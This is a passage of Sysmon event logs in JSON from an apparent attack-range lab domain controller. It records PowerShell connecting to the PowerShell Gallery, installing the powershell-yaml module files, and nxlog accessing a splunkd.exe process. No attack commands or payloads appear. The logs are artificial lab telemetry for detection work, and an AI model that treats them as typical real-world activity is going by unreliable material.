(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:07.523","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5166,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:05.668\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52656\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 104.117.16.77\r\nDestinationHostname: a104-117-16-77.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:05.668","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52656","DestinationIsIpv6":"false","DestinationIp":"104.117.16.77","DestinationHostname":"a104-117-16-77.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5167,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:05.816\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52657\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:05.816","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52657","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5168,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:05.965\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52658\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 104.117.16.77\r\nDestinationHostname: a104-117-16-77.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:05.965","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52658","DestinationIsIpv6":"false","DestinationIp":"104.117.16.77","DestinationHostname":"a104-117-16-77.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5169,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:08.523\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:08.523","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5170,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:06.045\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52659\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:06.045","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52659","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5171,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:06.183\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52660\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 104.117.16.77\r\nDestinationHostname: a104-117-16-77.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:06.183","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52660","DestinationIsIpv6":"false","DestinationIp":"104.117.16.77","DestinationHostname":"a104-117-16-77.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5172,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:06.262\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52661\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:06.262","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52661","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":5173,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:05.778\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nQueryName: www.powershellgallery.com\r\nQueryStatus: 0\r\nQueryResults: type:  5 powershellgallerytrafficmanager.trafficmanager.net;type:  5 psg-prod-centralus.cloudapp.net;::ffff:168.61.186.235;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:55:05.778","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","QueryName":"www.powershellgallery.com","QueryStatus":"0","QueryResults":"type:  5 powershellgallerytrafficmanager.trafficmanager.net;type:  5 psg-prod-centralus.cloudapp.net;::ffff:168.61.186.235;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5174,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:09.523\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:09.523","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5175,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:09.555\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\5p2wsv1j\\Load-Assemblies.ps1\r\nCreationUtcTime: 2020-08-01 06:55:09.555","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:09.555","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5p2wsv1j\\Load-Assemblies.ps1","CreationUtcTime":"2020-08-01 06:55:09.555","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5176,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:09.570\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\5p2wsv1j\\Tests\\powershell-yaml.Tests.ps1\r\nCreationUtcTime: 2020-08-01 06:55:09.570","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:09.570","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5p2wsv1j\\Tests\\powershell-yaml.Tests.ps1","CreationUtcTime":"2020-08-01 06:55:09.570","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5177,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:09.570\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\5p2wsv1j\\lib\\net35\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 06:55:09.570","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:09.570","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5p2wsv1j\\lib\\net35\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 06:55:09.570","EventReceivedTime":"2020-08-01 06:55:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
